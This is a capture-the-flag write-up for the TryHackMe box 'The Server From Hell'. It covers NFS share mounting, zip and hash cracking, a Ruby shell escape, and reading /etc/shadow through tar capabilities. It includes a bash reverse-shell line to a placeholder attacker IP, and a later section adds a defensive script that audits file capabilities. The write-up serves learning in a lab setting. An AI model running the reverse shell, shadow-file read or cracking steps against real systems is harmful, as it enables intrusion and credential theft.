The Server From Hell (THM) - Write-up


The Server From Hell is a machine from TryHackMe that was rated as medium difficulty. I must say that this one was a fun box where I've learned a lot of things.
Now, we start as always with an nmap scan.
Command: nmap $IP
The nmap result showed me that there are 30,000 open ports. Now this is not good. If we take a look at the box page on THM, the creator of the box left us a message.

I think that is a good idea 😁. Let's see what is on port 1337.

Hmm, this is weird, it says that the connection was reset, let's see what BurpSuite says.

OK, we have to find the troll face. To do that we need to do some banner grabbing.

Command: nc $IP 1-100 -v

Now we got something, let's use nc again to check the banner.

Command: nc $IP 1**** -v 

Let's check what shares are available.

Command: sudo showmount -e $IP

Now let's mount those shares.

Command: sudo mount -t nfs $IP:/home/*** /mnt/nfs

Just a .zip file. I tried to extract its content, but it looks like it is password protected, so I used a tool called fcrackzip to crack the password.

Command: fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' backup.zip

Note: you can use JtR to crack the password as well.

File content extracted from the zip archive

I tried to use the id_rsa key to connect to the machine via SSH, but I couldn't do it because port 22 was not used for SSH. There is a hint in there that could mean only one thing: finding the SSH port.

To do that I had to use netcat again to grab the banner.

Command 1: while true ; do ssh -i id_rsa hades@$IP -p `shuf -i 2500-4500 -n 1` ; done

or

Command 2: nc $IP 2500-4500 | grep SSH

Note: I would recommend the first command because it is way faster.

As we can see from the image below, this is not an ordinary shell.

I did some research and found that this is a Ruby interactive shell, and if we use system "our bash command" we can execute normal commands.

The next step for me was to get a proper shell, and I did that by calling a reverse shell.

Command: system "bash -c '/bin/bash -i >& /dev/tcp/ATTACKER IP/PORT 0<&1'"

I used linpeas to find the interesting stuff on the machine, and one thing stood out to me, tar capabilities.

This means that we can archive any file we want, then extract it and read it. So that's what I did: I used tar to read the /etc/shadow file.

First archive the file:

Command: tar cvf shadow.tar /etc/shadow

Second, extract the file (tar strips the leading slash, so the file lands in ./etc/shadow):

Command: tar -xvf shadow.tar

And third, read the content of the file:

Command: tail -8 etc/shadow
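From the defender's side, the lesson of this box is that a file capability on a general-purpose tool like tar is as dangerous as a SUID bit. The following script is an added example (not part of the original write-up) that audits `getcap -r /` output and flags capabilities which bypass file permission checks or grant root-equivalent power. The list of risky capabilities is my own assumption, and the input lines are constructed to cover both the old (`path = caps+ep`) and the newer (`path caps=ep`) libcap output formats.

```shell
#!/usr/bin/env sh
# Added example: audit file capabilities and flag the ones that let a binary
# read or modify files it should not (the tar situation from the write-up).
# Input is the text that `getcap -r / 2>/dev/null` prints, one binary per line.

# Capabilities worth a closer look (assumed list, not from the write-up).
RISKY_CAPS='cap_dac_read_search cap_dac_override cap_setuid cap_setgid cap_sys_admin cap_sys_ptrace cap_chown cap_fowner'

# Constructed sample output in both libcap formats.
SAMPLE_GETCAP='/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/python3.8 cap_setuid=ep'

# flag_caps: reads getcap output on stdin and prints "<path> <capability>"
# for every risky capability found. Returns 0 when nothing is flagged,
# 1 when at least one binary needs review.
flag_caps() {
  found=0
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    path=${line%% *}              # everything before the first space
    caps=${line#"$path"}          # the remainder: " = caps+ep" or " caps=ep"
    caps=${caps#" = "}            # old libcap format separator
    caps=${caps#" "}              # new libcap format separator
    for cap in $RISKY_CAPS; do
      case "$caps" in
        *"$cap"*) printf '%s %s\n' "$path" "$cap"; found=1 ;;
      esac
    done
  done
  return $found
}

# Stand-alone run: audit the live system when getcap is available,
# otherwise demonstrate on the constructed sample.
if command -v getcap >/dev/null 2>&1; then
  getcap -r / 2>/dev/null | flag_caps || echo 'review the binaries listed above'
else
  printf '%s\n' "$SAMPLE_GETCAP" | flag_caps || echo 'review the binaries listed above'
fi
```

On the sample input the script reports tar (cap_dac_read_search, which is exactly what lets it archive /etc/shadow) and the Python binary (cap_setuid), while ping's cap_net_raw is left alone because it does not bypass file permissions.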

Let's crack vagrant's password, which is a sha512crypt hash. For that I used hashcat on Windows because cracking hashes on VMs is not recommended.

Command: hashcat -m 1800 hash rockyou.txt

😐😐😐😐😐OK, interesting password!

Now that we can login as user vagrant let's check his privileges by running sudo -l.

😐😐😐😐😐 Interesting, again! Let's get a root shell.

Now we can easily get a root shell and read both flags, user and root. The user flag is in the NFS share directory.
